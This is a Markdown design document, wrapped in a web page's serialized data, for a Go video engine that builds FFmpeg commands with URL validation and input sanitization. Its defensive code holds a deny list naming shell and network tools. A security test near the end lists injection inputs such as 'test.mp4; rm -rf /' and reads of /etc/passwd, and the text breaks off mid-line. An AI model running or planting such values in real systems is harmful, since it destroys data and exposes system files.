[{"_1":2,"_87":-5,"_88":-5},"loaderData",{"_3":4,"_7":8},"root",{"_5":6},"gaMeasurementId","G-LQYTSH5Y0M","routes/skill.$id",{"_9":10,"_55":56,"_60":61,"_80":-5,"_81":82,"_85":86},"skill",{"_11":12,"_13":14,"_15":16,"_17":18,"_19":20,"_21":22,"_23":24,"_25":26,"_27":28,"_29":30,"_31":32,"_33":34,"_35":36,"_37":38,"_39":38,"_40":41,"_42":38,"_43":44,"_45":46,"_47":48,"_49":-5,"_50":-5,"_51":52,"_53":34,"_54":26},"id","2d50ed5a-c3ec-4050-b86e-120b160528ea","title","VideoCraft Video Engine - FFmpeg Integration & Security-First Command Construction","description","The video engine represents the core of VideoCraft's video generation capabilities, implementing secure FFmpeg command construction, comprehensive security controls, and sophisticated video processing workflows with progressive subtitle integration.","content","# VideoCraft Video Engine - FFmpeg Integration & Security-First Command Construction\n\nThe video engine represents the core of VideoCraft's video generation capabilities, implementing secure FFmpeg command construction, comprehensive security controls, and sophisticated video processing workflows with progressive subtitle integration.\n\n## 🎬 Video Engine Architecture\n\n```mermaid\ngraph TB\n subgraph \"Video Engine Core\"\n COMMAND[Command Builder]\n SECURITY[Security Layer]\n EXECUTOR[Command Executor]\n PROGRESS[Progress Tracker]\n end\n \n subgraph \"FFmpeg Integration\"\n FFMPEG[FFmpeg Binary]\n FFPROBE[FFprobe Analysis]\n FILTERS[Filter Complex]\n CODECS[Video Codecs]\n end\n \n subgraph \"Security Controls\"\n URL_VALIDATION[URL Validation]\n INJECTION_PREVENTION[Injection Prevention]\n SANITIZATION[Input Sanitization]\n ALLOWLIST[Domain Allowlist]\n end\n \n subgraph \"Processing Pipeline\"\n VIDEO_INPUT[Background Video]\n AUDIO_CONCAT[Audio Concatenation]\n IMAGE_OVERLAY[Image Overlays]\n SUBTITLE_INTEGRATION[Subtitle Integration]\n FINAL_OUTPUT[Final Video Output]\n end\n \n subgraph \"Command Construction\"\n INPUTS[Input Management]\n FILTERS_BUILD[Filter Building]\n OUTPUT_SETTINGS[Output Settings]\n PATH_GENERATION[Path Generation]\n end\n \n COMMAND --> SECURITY\n SECURITY --> EXECUTOR\n EXECUTOR --> PROGRESS\n \n COMMAND --> FFMPEG\n FFMPEG --> FFPROBE\n FFMPEG --> FILTERS\n FFMPEG --> CODECS\n \n SECURITY --> URL_VALIDATION\n SECURITY --> INJECTION_PREVENTION\n SECURITY --> SANITIZATION\n SECURITY --> ALLOWLIST\n \n COMMAND --> VIDEO_INPUT\n VIDEO_INPUT --> AUDIO_CONCAT\n AUDIO_CONCAT --> IMAGE_OVERLAY\n IMAGE_OVERLAY --> SUBTITLE_INTEGRATION\n SUBTITLE_INTEGRATION --> FINAL_OUTPUT\n \n COMMAND --> INPUTS\n INPUTS --> FILTERS_BUILD\n FILTERS_BUILD --> OUTPUT_SETTINGS\n OUTPUT_SETTINGS --> PATH_GENERATION\n \n style SECURITY fill:#ffebee\n style COMMAND fill:#e3f2fd\n style FFMPEG fill:#f3e5f5\n style FINAL_OUTPUT fill:#e8f5e8\n```\n\n## 📁 Engine Package Structure\n\n```\ninternal/core/video/engine/\n├── command.go # FFmpeg command construction and execution\n└── security.go # Security validation and injection prevention\n```\n\n## ⚙️ FFmpeg Service Interface\n\n### Comprehensive Video Generation API\n\n```go\ntype Service interface {\n // Core video generation methods\n GenerateVideo(ctx context.Context, config *models.VideoConfigArray, progressChan chan<- int) (string, error)\n GenerateVideoWithSubtitles(ctx context.Context, config *models.VideoConfigArray, subtitleFilePath string, progressChan chan<- int) (string, error)\n \n // Command building and execution\n BuildCommand(config *models.VideoConfigArray) (*FFmpegCommand, error)\n Execute(ctx context.Context, cmd *FFmpegCommand) error\n}\n\ntype FFmpegCommand struct {\n Args []string // Complete FFmpeg arguments\n OutputPath string // Generated output file path\n}\n\ntype service struct {\n cfg *app.Config\n log logger.Logger\n}\n\nconst (\n elementTypeVideo = \"video\"\n elementTypeAudio = \"audio\"\n elementTypeSubtitles = \"subtitles\"\n videoInputRef = \"0:v\"\n)\n```\n\n## 🎯 Video Generation Implementation\n\n### Main Generation Workflow\n\n```mermaid\nsequenceDiagram\n participant Client as Job Service\n participant Engine as Video Engine\n participant Security as Security Layer\n participant Builder as Command Builder\n participant FFmpeg as FFmpeg Process\n participant Progress as Progress Tracker\n \n Client->>Engine: GenerateVideo(config, progressChan)\n Engine->>Security: validateAllURLsInConfig(config)\n Security->>Security: URL validation & sanitization\n Security-->>Engine: Validation passed\n \n Engine->>Builder: BuildCommand(config)\n Builder->>Builder: Collect media elements\n Builder->>Builder: Calculate timing & duration\n Builder->>Builder: Build filter complex\n Builder-->>Engine: FFmpegCommand ready\n \n Engine->>FFmpeg: exec.CommandContext(ffmpegCmd)\n Engine->>Progress: parseProgress(stderr, progressChan)\n \n loop Progress Updates\n FFmpeg->>Progress: stderr output\n Progress->>Progress: Parse time/duration\n Progress->>Client: Progress percentage\n end\n \n FFmpeg-->>Engine: Process complete\n Engine-->>Client: Generated video path\n \n Note over Security: Multi-layer security validation\n Note over Progress: Real-time progress tracking\n```\n\n### Video Generation with Security\n\n```go\nfunc (s *service) GenerateVideo(ctx context.Context, config *models.VideoConfigArray, progressChan chan<- int) (string, error) {\n s.log.Info(\"Starting video generation\")\n \n // Build FFmpeg command with comprehensive security validation\n cmd, err := s.BuildCommand(config)\n if err != nil {\n return \"\", errors.FFmpegFailed(fmt.Errorf(\"failed to build command: %w\", err))\n }\n \n s.log.Debugf(\"Generated FFmpeg command: %s %s\", s.cfg.FFmpeg.BinaryPath, strings.Join(cmd.Args, \" \"))\n \n // Execute with timeout and context cancellation\n ctx, cancel := context.WithTimeout(ctx, s.cfg.FFmpeg.Timeout)\n defer cancel()\n \n ffmpegCmd := exec.CommandContext(ctx, s.cfg.FFmpeg.BinaryPath, cmd.Args...)\n \n // Setup real-time progress tracking\n if progressChan != nil {\n stderr, err := ffmpegCmd.StderrPipe()\n if err != nil {\n return \"\", errors.FFmpegFailed(err)\n }\n \n // Parse progress in dedicated goroutine\n go s.parseProgress(stderr, progressChan)\n }\n \n // Execute FFmpeg command\n if err := ffmpegCmd.Run(); err != nil {\n return \"\", errors.FFmpegFailed(err)\n }\n \n s.log.Infof(\"Video generation completed: %s\", cmd.OutputPath)\n return cmd.OutputPath, nil\n}\n```\n\n### Progressive Subtitle Integration\n\n```go\nfunc (s *service) GenerateVideoWithSubtitles(ctx context.Context, config *models.VideoConfigArray, subtitleFilePath string, progressChan chan<- int) (string, error) {\n s.log.Info(\"Starting video generation with progressive subtitles\")\n s.log.Debugf(\"Subtitle file: %s\", subtitleFilePath)\n \n if len(*config) == 0 {\n return \"\", fmt.Errorf(\"no video projects provided\")\n }\n \n project := (*config)[0]\n audioElements := s.collectAudioElements(project)\n totalDuration := s.calculateTotalDuration(audioElements)\n \n // Build FFmpeg command with subtitle integration\n cmd, err := s.buildCommandWithSubtitleFileAndDuration(config, subtitleFilePath, totalDuration)\n if err != nil {\n return \"\", errors.FFmpegFailed(fmt.Errorf(\"failed to build command with subtitles: %w\", err))\n }\n \n s.log.Debugf(\"Generated FFmpeg command with subtitles: %s %s\", s.cfg.FFmpeg.BinaryPath, strings.Join(cmd.Args, \" \"))\n \n // Execute with timeout\n ctx, cancel := context.WithTimeout(ctx, s.cfg.FFmpeg.Timeout)\n defer cancel()\n \n ffmpegCmd := exec.CommandContext(ctx, s.cfg.FFmpeg.BinaryPath, cmd.Args...)\n \n // Setup progress tracking\n if progressChan != nil {\n stderr, err := ffmpegCmd.StderrPipe()\n if err != nil {\n return \"\", errors.FFmpegFailed(err)\n }\n \n go s.parseProgress(stderr, progressChan)\n }\n \n // Execute command\n if err := ffmpegCmd.Run(); err != nil {\n return \"\", errors.FFmpegFailed(err)\n }\n \n s.log.Infof(\"Video generation with subtitles completed: %s\", cmd.OutputPath)\n return cmd.OutputPath, nil\n}\n```\n\n## 🔨 Advanced Command Construction\n\n### Secure Command Building\n\n```go\nfunc (s *service) BuildCommand(config *models.VideoConfigArray) (*FFmpegCommand, error) {\n if len(*config) == 0 {\n return nil, fmt.Errorf(\"no video projects provided\")\n }\n \n // CRITICAL: Security validation - Check all URLs in configuration\n if err := s.validateAllURLsInConfig(config); err != nil {\n return nil, fmt.Errorf(\"security validation failed: %w\", err)\n }\n \n project := (*config)[0]\n builder := newCommandBuilder()\n \n // Find background video element\n var backgroundVideo *models.Element\n for _, element := range project.Elements {\n if element.Type == elementTypeVideo {\n backgroundVideo = &element\n break\n }\n }\n \n if backgroundVideo == nil {\n return nil, fmt.Errorf(\"no background video element found\")\n }\n \n // Collect media elements from scenes\n audioElements := s.collectAudioElements(project)\n imageElements := s.collectImageElements(project)\n totalDuration := s.calculateTotalDuration(audioElements)\n \n // Add inputs with security protocols\n builder.addInput(\"-y\") // Overwrite output\n builder.addInput(\"-protocol_whitelist\", \"file,http,https,tcp,tls\")\n \n // Background video with intelligent looping\n loopsNeeded := int(totalDuration/backgroundVideo.Duration) + 1\n builder.addInput(\"-stream_loop\", fmt.Sprintf(\"%d\", loopsNeeded), \"-i\", backgroundVideo.Src)\n \n // Audio inputs in scene order\n for _, audio := range audioElements {\n builder.addInput(\"-i\", audio.Src)\n }\n \n // Image inputs for overlays\n for _, image := range imageElements {\n builder.addInput(\"-i\", image.Src)\n }\n \n // Build sophisticated filter complex\n sceneTiming := s.generateFallbackTiming(audioElements)\n filterComplex := s.buildFilterComplexWithSceneTiming(project, audioElements, imageElements, sceneTiming, totalDuration)\n \n if filterComplex != \"\" {\n builder.addArg(\"-filter_complex\", filterComplex)\n }\n \n // Map outputs intelligently\n if len(imageElements) > 0 {\n builder.addArg(\"-map\", fmt.Sprintf(\"[overlay_%d]\", len(imageElements)-1))\n } else {\n builder.addArg(\"-map\", \"0:v\")\n }\n \n if len(audioElements) > 0 {\n builder.addArg(\"-map\", \"[final_audio]\")\n }\n \n // Set precise duration\n builder.addArg(\"-t\", fmt.Sprintf(\"%.2f\", totalDuration))\n \n // Add optimized output settings\n s.addOutputSettingsForProject(builder, project)\n \n // Generate secure output path\n outputPath := s.generateOutputPathForProject(project)\n builder.addArg(outputPath)\n \n return &FFmpegCommand{\n Args: builder.args,\n OutputPath: outputPath,\n }, nil\n}\n```\n\n### Advanced Filter Complex Generation\n\n```go\nfunc (s *service) buildFilterComplexWithSceneTiming(project models.VideoProject, audioElements, imageElements []models.Element, sceneTiming []models.TimingSegment, totalDuration float64) string {\n var filters []string\n \n // Audio concatenation with padding\n s.addAudioConcatenationFilters(&filters, audioElements)\n \n // Image overlays with precise timing based on audio analysis\n currentInput := s.addImageOverlayFilters(&filters, imageElements, audioElements, sceneTiming)\n _ = currentInput // Prevent unused variable warning\n \n return strings.Join(filters, \";\")\n}\n\nfunc (s *service) addAudioConcatenationFilters(filters *[]string, audioElements []models.Element) {\n if len(audioElements) > 1 {\n // Multiple audio files - concatenate them\n audioInputs := make([]string, len(audioElements))\n for i := range audioElements {\n audioInputs[i] = fmt.Sprintf(\"[%d:a]\", i+1) // +1 because 0 is background video\n }\n audioConcat := fmt.Sprintf(\"%sconcat=n=%d:v=0:a=1[concatenated_audio]\",\n strings.Join(audioInputs, \"\"),\n len(audioElements))\n *filters = append(*filters, audioConcat)\n *filters = append(*filters, \"[concatenated_audio]apad=pad_dur=2[final_audio]\")\n } else if len(audioElements) == 1 {\n // Single audio file - just add padding\n *filters = append(*filters, \"[1:a]apad=pad_dur=2[final_audio]\")\n }\n}\n\nfunc (s *service) addImageOverlayFilters(filters *[]string, imageElements, audioElements []models.Element, sceneTiming []models.TimingSegment) string {\n currentInput := videoInputRef\n \n for i, image := range imageElements {\n // Use scene timing from audio analysis\n var startTime, endTime float64\n if i < len(sceneTiming) {\n startTime = sceneTiming[i].StartTime\n endTime = sceneTiming[i].EndTime\n } else {\n // Fallback if we have more images than timing segments\n startTime = float64(i) * 5.0\n endTime = startTime + 5.0\n }\n \n s.log.Debugf(\"Image %d overlay timing: %.2fs - %.2fs (duration: %.2fs)\",\n i, startTime, endTime, endTime-startTime)\n \n // Scale image to consistent size\n imageInputIndex := len(audioElements) + 1 + i\n scaleFilter := fmt.Sprintf(\"[%d:v]scale=500:500[scaled_img_%d]\",\n imageInputIndex, i)\n *filters = append(*filters, scaleFilter)\n \n // Overlay with precise timing control\n overlayFilter := fmt.Sprintf(\"[%s][scaled_img_%d]overlay=%d:%d:enable='between(t\\\\,%f\\\\,%f)'[overlay_%d]\",\n currentInput, i, image.X, image.Y, startTime, endTime, i)\n *filters = append(*filters, overlayFilter)\n \n currentInput = fmt.Sprintf(\"overlay_%d\", i)\n }\n \n return currentInput\n}\n```\n\n### Subtitle Integration with ASS Support\n\n```go\nfunc (s *service) buildCommandWithSubtitleFileAndDuration(config *models.VideoConfigArray, subtitleFilePath string, totalDuration float64) (*FFmpegCommand, error) {\n if len(*config) == 0 {\n return nil, fmt.Errorf(\"no video projects provided\")\n }\n \n project := (*config)[0]\n builder := newCommandBuilder()\n \n // Find background video element\n var backgroundVideo *models.Element\n for _, element := range project.Elements {\n if element.Type == elementTypeVideo {\n backgroundVideo = &element\n break\n }\n }\n \n if backgroundVideo == nil {\n return nil, fmt.Errorf(\"no background video element found\")\n }\n \n // Collect media elements\n audioElements := s.collectAudioElements(project)\n imageElements := s.collectImageElements(project)\n \n // Analyze scene timing for precise overlay synchronization\n sceneTiming, err := s.analyzeSceneTiming(audioElements)\n if err != nil {\n s.log.Warnf(\"Failed to analyze scene timing: %v, using fallback\", err)\n sceneTiming = s.generateFallbackTiming(audioElements)\n }\n \n // Add inputs with security controls\n builder.addInput(\"-y\") // Overwrite output\n builder.addInput(\"-protocol_whitelist\", \"file,http,https,tcp,tls\")\n \n // Background video with loop\n loopsNeeded := int(totalDuration/backgroundVideo.Duration) + 1\n builder.addInput(\"-stream_loop\", fmt.Sprintf(\"%d\", loopsNeeded), \"-i\", backgroundVideo.Src)\n \n // Audio inputs\n for _, audio := range audioElements {\n builder.addInput(\"-i\", audio.Src)\n }\n \n // Image inputs\n for _, image := range imageElements {\n builder.addInput(\"-i\", image.Src)\n }\n \n // Build filter complex with subtitle support and precise timing\n filterComplex := s.buildFilterComplexWithSubtitlesAndTiming(project, audioElements, imageElements, sceneTiming, totalDuration, subtitleFilePath)\n \n if filterComplex != \"\" {\n builder.addArg(\"-filter_complex\", filterComplex)\n }\n \n // Map outputs with subtitle consideration\n outputVideoStream := s.getOutputVideoStream(imageElements, subtitleFilePath)\n builder.addArg(\"-map\", outputVideoStream)\n \n if len(audioElements) > 0 {\n builder.addArg(\"-map\", \"[final_audio]\")\n }\n \n // Set duration and output settings\n builder.addArg(\"-t\", fmt.Sprintf(\"%.2f\", totalDuration))\n s.addOutputSettingsForProject(builder, project)\n \n // Generate output path\n outputPath := s.generateOutputPathForProject(project)\n builder.addArg(outputPath)\n \n return &FFmpegCommand{\n Args: builder.args,\n OutputPath: outputPath,\n }, nil\n}\n\nfunc (s *service) addSubtitleFilter(filters *[]string, currentVideo string, subtitleFilePath string) string {\n s.log.Infof(\"Adding progressive subtitle overlay: %s\", subtitleFilePath)\n \n if currentVideo == videoInputRef {\n *filters = append(*filters, fmt.Sprintf(\"[0:v]ass='%s'[subtitled_video]\", subtitleFilePath))\n } else {\n *filters = append(*filters, fmt.Sprintf(\"[%s]ass='%s'[subtitled_video]\", currentVideo, subtitleFilePath))\n }\n \n return \"subtitled_video\"\n}\n\nfunc (s *service) buildFilterComplexWithSubtitlesAndTiming(project models.VideoProject, audioElements, imageElements []models.Element, sceneTiming []models.TimingSegment, totalDuration float64, subtitleFilePath string) string {\n var filters []string\n \n // Audio concatenation\n s.addAudioConcatenationFilters(&filters, audioElements)\n \n // Image overlays with timing based on actual audio analysis\n currentInput := s.addImageOverlayFilters(&filters, imageElements, audioElements, sceneTiming)\n \n // Add progressive subtitle filter if subtitle file is provided\n if subtitleFilePath != \"\" {\n finalVideoStream := s.addSubtitleFilter(&filters, currentInput, subtitleFilePath)\n _ = finalVideoStream // Update the final output stream name\n }\n \n return strings.Join(filters, \";\")\n}\n```\n\n## 🛡️ Comprehensive Security Layer\n\n### Multi-Layer Security Architecture\n\n```mermaid\ngraph TB\n subgraph \"Security Validation Pipeline\"\n INPUT[User Input] -->|1| DATA_URI[Data URI Detection]\n DATA_URI -->|2| INJECTION[Injection Character Check]\n INJECTION -->|3| TRAVERSAL[Path Traversal Check]\n TRAVERSAL -->|4| PROTOCOL[Protocol Validation]\n PROTOCOL -->|5| ALLOWLIST[Domain Allowlist]\n ALLOWLIST -->|6| SAFE[Safe for Processing]\n end\n \n subgraph \"Threat Detection Patterns\"\n DANGEROUS_SCHEMES[javascript:, data:, file:]\n INJECTION_CHARS[;|`$(){}]\n TRAVERSAL_PATTERNS[../, ..\\\\]\n MALICIOUS_COMMANDS[rm, sudo, bash, etc.]\n end\n \n subgraph \"Security Controls\"\n SANITIZATION[Input Sanitization]\n LOGGING[Security Violation Logging]\n MONITORING[Real-time Monitoring]\n ALERTING[Security Alerting]\n end\n \n DATA_URI -.->|Detect| DANGEROUS_SCHEMES\n INJECTION -.->|Detect| INJECTION_CHARS\n TRAVERSAL -.->|Detect| TRAVERSAL_PATTERNS\n ALLOWLIST -.->|Check| MALICIOUS_COMMANDS\n \n DANGEROUS_SCHEMES --> LOGGING\n INJECTION_CHARS --> LOGGING\n TRAVERSAL_PATTERNS --> LOGGING\n MALICIOUS_COMMANDS --> LOGGING\n \n LOGGING --> MONITORING\n MONITORING --> ALERTING\n \n INPUT -.->|Alternative| SANITIZATION\n SANITIZATION -.->|Clean| SAFE\n \n style INPUT fill:#e3f2fd\n style SAFE fill:#e8f5e8\n style LOGGING fill:#ffebee\n style DANGEROUS_SCHEMES fill:#ffcdd2\n```\n\n### Advanced URL Validation\n\n```go\nvar (\n // Prohibited characters that could be used for command injection\n prohibitedCharsRegex = regexp.MustCompile(`[;|` + \"`\" + `$(){}]`)\n \n // Path traversal patterns for directory navigation attacks\n pathTraversalRegex = regexp.MustCompile(`\\.\\.\\/|\\.\\.\\\\`)\n \n // Allowed URL protocols for security\n allowedProtocols = map[string]bool{\n \"http\": true,\n \"https\": true,\n }\n \n // Dangerous commands that should be rejected after sanitization\n dangerousCommands = map[string]bool{\n \"rm\": true, \"cat\": true, \"ls\": true, \"chmod\": true, \"chown\": true,\n \"sudo\": true, \"su\": true, \"bash\": true, \"sh\": true, \"cmd\": true,\n \"powershell\": true, \"wget\": true, \"curl\": true, \"nc\": true, \"netcat\": true,\n }\n)\n\nfunc (s *service) ValidateURL(rawURL string) error {\n // Allow empty URLs (will be handled by other validation layers)\n if rawURL == \"\" {\n return nil\n }\n \n // Early rejection of data URIs (most common injection vector)\n if err := s.checkForDataURI(rawURL); err != nil {\n return err\n }\n \n // Character-based injection detection\n if err := s.checkForInjectionChars(rawURL); err != nil {\n return err\n }\n \n // Path traversal detection\n if err := s.checkForPathTraversal(rawURL); err != nil {\n return err\n }\n \n // URL structure validation and protocol checking\n return s.validateURLStructureAndProtocol(rawURL)\n}\n\nfunc (s *service) checkForDataURI(rawURL string) error {\n lowerURL := strings.ToLower(rawURL)\n \n // Check for dangerous URI schemes\n dangerousSchemes := []string{\"data:\", \"javascript:\", \"vbscript:\", \"file:\"}\n \n for _, scheme := range dangerousSchemes {\n if strings.HasPrefix(lowerURL, scheme) {\n s.logSecurityViolation(\"URL validation failed\", map[string]interface{}{\n \"url\": rawURL,\n \"violation_type\": \"protocol_violation\",\n \"reason\": fmt.Sprintf(\"Protocol %s not allowed\", scheme),\n })\n return errors.New(\"protocol not allowed\")\n }\n }\n \n return nil\n}\n\nfunc (s *service) checkForInjectionChars(rawURL string) error {\n if prohibitedCharsRegex.MatchString(rawURL) {\n s.logSecurityViolation(\"URL validation failed\", map[string]interface{}{\n \"url\": rawURL,\n \"violation_type\": \"command_injection\",\n \"reason\": \"URL contains prohibited characters\",\n })\n return errors.New(\"URL contains prohibited characters\")\n }\n return nil\n}\n\nfunc (s *service) checkForPathTraversal(rawURL string) error {\n if pathTraversalRegex.MatchString(rawURL) {\n s.logSecurityViolation(\"URL validation failed\", map[string]interface{}{\n \"url\": rawURL,\n \"violation_type\": \"path_traversal\",\n \"reason\": \"URL contains path traversal sequences\",\n })\n return errors.New(\"URL contains path traversal sequences\")\n }\n return nil\n}\n```\n\n### Input Sanitization & Command Protection\n\n```go\nfunc (s *service) SanitizeInput(input string) (string, error) {\n original := input\n \n // Remove prohibited characters\n sanitized := prohibitedCharsRegex.ReplaceAllString(input, \"\")\n \n // Clean path traversal sequences\n sanitized = pathTraversalRegex.ReplaceAllString(sanitized, \"\")\n \n // Split by spaces and keep only the first token (before any command)\n tokens := strings.Fields(sanitized)\n if len(tokens) > 0 {\n sanitized = tokens[0]\n }\n \n // Remove extra whitespace\n sanitized = strings.TrimSpace(sanitized)\n \n // If the entire input was malicious content or only common command names, reject it\n if sanitized == \"\" && original != \"\" {\n return \"\", errors.New(\"input contains only malicious content\")\n }\n \n // Additional check: reject if sanitized result is a common dangerous command\n if dangerousCommands[strings.ToLower(sanitized)] {\n return \"\", errors.New(\"input contains only malicious content\")\n }\n \n return sanitized, nil\n}\n\nfunc (s *service) ValidateURLAllowlist(rawURL string) error {\n // If no allowlist is configured, allow all valid URLs\n if len(s.cfg.Security.AllowedDomains) == 0 {\n return nil\n }\n \n parsedURL, err := url.Parse(rawURL)\n if err != nil {\n return fmt.Errorf(\"invalid URL format: %w\", err)\n }\n \n // Check if domain is in allowlist\n for _, allowedDomain := range s.cfg.Security.AllowedDomains {\n if parsedURL.Host == allowedDomain {\n return nil\n }\n }\n \n s.logSecurityViolation(\"Domain not in allowlist\", map[string]interface{}{\n \"url\": rawURL,\n \"domain\": parsedURL.Host,\n \"violation_type\": \"domain_not_allowed\",\n })\n \n return errors.New(\"domain not in allowlist\")\n}\n```\n\n### Comprehensive Configuration Validation\n\n```go\nfunc (s *service) validateAllURLsInConfig(config *models.VideoConfigArray) error {\n urlCount := 0\n \n for projectIdx, project := range *config {\n for sceneIdx, scene := range project.Scenes {\n for elementIdx, element := range scene.Elements {\n if element.Src != \"\" {\n urlCount++\n \n // Create context for better error reporting\n elementContext := fmt.Sprintf(\"project[%d].scene[%d].element[%d](%s)\",\n projectIdx, sceneIdx, elementIdx, element.Type)\n \n // Basic URL validation\n if err := s.ValidateURL(element.Src); err != nil {\n return fmt.Errorf(\"security validation failed for %s: %w\", elementContext, err)\n }\n \n // Domain allowlist validation\n if err := s.ValidateURLAllowlist(element.Src); err != nil {\n return fmt.Errorf(\"security validation failed for %s: %w\", elementContext, err)\n }\n }\n }\n }\n }\n \n // Log successful validation for monitoring\n s.log.WithFields(map[string]interface{}{\n \"urls_validated\": urlCount,\n \"projects\": len(*config),\n }).Info(\"All URLs passed security validation\")\n \n return nil\n}\n\nfunc (s *service) logSecurityViolation(message string, fields map[string]interface{}) {\n s.log.WithFields(fields).Errorf(\"SECURITY_VIOLATION: %s\", message)\n}\n```\n\n## 📊 Real-Time Progress Tracking\n\n### Advanced FFmpeg Progress Parser\n\n```go\nfunc (s *service) parseProgress(stderr io.ReadCloser, progressChan chan<- int) {\n defer close(progressChan)\n defer stderr.Close()\n \n scanner := bufio.NewScanner(stderr)\n var totalDuration float64\n \n // Regular expressions for parsing FFmpeg output\n durationRegex := regexp.MustCompile(`Duration: (\\d{2}):(\\d{2}):(\\d{2})\\.(\\d{2})`)\n timeRegex := regexp.MustCompile(`time=(\\d{2}):(\\d{2}):(\\d{2})\\.(\\d{2})`)\n \n for scanner.Scan() {\n line := scanner.Text()\n s.log.Debugf(\"FFmpeg output: %s\", line)\n \n // Parse total duration from the beginning\n if totalDuration == 0 {\n if matches := durationRegex.FindStringSubmatch(line); len(matches) == 5 {\n hours, _ := strconv.Atoi(matches[1])\n minutes, _ := strconv.Atoi(matches[2])\n seconds, _ := strconv.Atoi(matches[3])\n centiseconds, _ := strconv.Atoi(matches[4])\n \n totalDuration = float64(hours*3600+minutes*60+seconds) + float64(centiseconds)/100\n s.log.Debugf(\"Total duration parsed: %.2f seconds\", totalDuration)\n }\n }\n \n // Parse current time progress\n if totalDuration > 0 {\n if matches := timeRegex.FindStringSubmatch(line); len(matches) == 5 {\n hours, _ := strconv.Atoi(matches[1])\n minutes, _ := strconv.Atoi(matches[2])\n seconds, _ := strconv.Atoi(matches[3])\n centiseconds, _ := strconv.Atoi(matches[4])\n \n currentTime := float64(hours*3600+minutes*60+seconds) + float64(centiseconds)/100\n progress := int((currentTime / totalDuration) * 100)\n \n // Cap progress at 100%\n if progress > 100 {\n progress = 100\n }\n \n // Send progress update non-blocking\n select {\n case progressChan <- progress:\n s.log.Debugf(\"Progress update: %d%%\", progress)\n default:\n // Channel blocked, skip this update\n }\n }\n }\n }\n \n if err := scanner.Err(); err != nil {\n s.log.Errorf(\"Error reading FFmpeg stderr: %v\", err)\n }\n}\n```\n\n## 🎬 Helper Functions & Utilities\n\n### Media Element Collection\n\n```go\nfunc (s *service) collectAudioElements(project models.VideoProject) []models.Element {\n var audioElements []models.Element\n \n // Collect from scenes in order\n for _, scene := range project.Scenes {\n for _, element := range scene.Elements {\n if element.Type == elementTypeAudio {\n audioElements = append(audioElements, element)\n }\n }\n }\n \n return audioElements\n}\n\nfunc (s *service) collectImageElements(project models.VideoProject) []models.Element {\n var imageElements []models.Element\n \n // Collect from scenes in order\n for _, scene := range project.Scenes {\n for _, element := range scene.Elements {\n if element.Type == \"image\" {\n imageElements = append(imageElements, element)\n }\n }\n }\n \n return imageElements\n}\n\nfunc (s *service) calculateTotalDuration(audioElements []models.Element) float64 {\n var total float64\n for _, audio := range audioElements {\n if audio.Duration > 0 {\n total += audio.Duration\n }\n }\n // Add 2 second buffer for smooth transitions\n return total + 2.0\n}\n```\n\n### Scene Timing Analysis\n\n```go\nfunc (s *service) analyzeSceneTiming(audioElements []models.Element) ([]models.TimingSegment, error) {\n // TODO: Implement advanced audio timing analysis\n // This would integrate with the audio service for precise timing\n return nil, fmt.Errorf(\"audio timing analysis not yet implemented\")\n}\n\nfunc (s *service) generateFallbackTiming(audioElements []models.Element) []models.TimingSegment {\n segments := make([]models.TimingSegment, len(audioElements))\n currentTime := 0.0\n \n for i, audio := range audioElements {\n duration := audio.Duration\n if duration <= 0 {\n duration = 5.0 // default fallback duration\n }\n \n segments[i] = models.TimingSegment{\n StartTime: currentTime,\n EndTime: currentTime + duration,\n AudioFile: audio.Src,\n }\n currentTime += duration\n }\n \n return segments\n}\n```\n\n### Output Configuration\n\n```go\nfunc (s *service) addOutputSettingsForProject(builder *commandBuilder, project models.VideoProject) {\n // Video codec settings\n builder.addArg(\"-c:v\", \"libx264\")\n builder.addArg(\"-c:a\", \"aac\")\n \n // Quality settings based on project configuration\n if project.Quality == \"high\" {\n builder.addArg(\"-crf\", \"18\") // High quality\n } else {\n builder.addArg(\"-crf\", \"23\") // Standard quality\n }\n \n // Resolution settings\n if project.Width > 0 && project.Height > 0 {\n builder.addArg(\"-s\", fmt.Sprintf(\"%dx%d\", project.Width, project.Height))\n }\n \n // Optimization settings\n builder.addArg(\"-preset\", \"medium\") // Encoding speed vs compression\n builder.addArg(\"-movflags\", \"+faststart\") // Enable progressive download\n builder.addArg(\"-pix_fmt\", \"yuv420p\") // Wide compatibility pixel format\n}\n\nfunc (s *service) generateOutputPathForProject(project models.VideoProject) string {\n format := \"mp4\" // Default format for wide compatibility\n filename := fmt.Sprintf(\"video_%s.%s\", uuid.New().String()[:8], format)\n return filepath.Join(s.cfg.Storage.OutputDir, filename)\n}\n\nfunc (s *service) getOutputVideoStream(imageElements []models.Element, subtitleFilePath string) string {\n if subtitleFilePath != \"\" {\n return \"[subtitled_video]\"\n } else if len(imageElements) > 0 {\n return fmt.Sprintf(\"[overlay_%d]\", len(imageElements)-1)\n } else {\n return videoInputRef\n }\n}\n```\n\n### Command Builder Helper\n\n```go\ntype commandBuilder struct {\n args []string\n}\n\nfunc newCommandBuilder() *commandBuilder {\n return &commandBuilder{\n args: []string{\"-y\"}, // Always overwrite output\n }\n}\n\nfunc (cb *commandBuilder) addInput(args ...string) {\n cb.args = append(cb.args, args...)\n}\n\nfunc (cb *commandBuilder) addArg(args ...string) {\n cb.args = append(cb.args, args...)\n}\n```\n\n## 🔧 Configuration\n\n### Engine Configuration\n\n```yaml\nffmpeg:\n binary_path: \"ffmpeg\" # FFmpeg executable path\n probe_path: \"ffprobe\" # FFprobe executable path\n timeout: \"30m\" # Maximum processing time\n threads: 0 # CPU threads (0 = auto-detect)\n preset: \"medium\" # Encoding preset\n \nvideo:\n output_format: \"mp4\" # Default output format\n default_resolution: \"1920x1080\" # Default resolution\n default_crf: 23 # Constant Rate Factor (quality)\n high_quality_crf: 18 # High quality CRF\n max_duration: 1800 # 30 minutes maximum\n \nprocessing:\n buffer_duration: 2.0 # Audio buffer in seconds\n overlay_scale: \"500:500\" # Default image overlay size\n loop_buffer: 1 # Extra loops for background video\n \nsecurity:\n allowed_protocols: [\"http\", \"https\"]\n allowed_domains: [] # Empty array = allow all\n max_url_length: 2048\n validate_urls: true\n sanitize_inputs: true\n log_violations: true\n \nprogress:\n update_interval: \"1s\" # Progress update frequency\n timeout_duration: \"30m\" # Progress parsing timeout\n stderr_buffer_size: 1024 # stderr reading buffer size\n```\n\n## 🧪 Testing Strategy\n\n### Security Testing\n\n```go\nfunc TestEngineService_SecurityValidation(t *testing.T) {\n maliciousURLs := []string{\n \"javascript:alert('xss')\",\n \"data:text/html,\",\n \"file:///etc/passwd\",\n \"http://localhost/admin\",\n \"https://example.com/../../../etc/passwd\",\n \"http://192.168.1.1/internal\",\n \"test.mp4; rm -rf /\",\n \"video.mp4 && cat /etc/passwd\",\n \"file.mp4 | nc 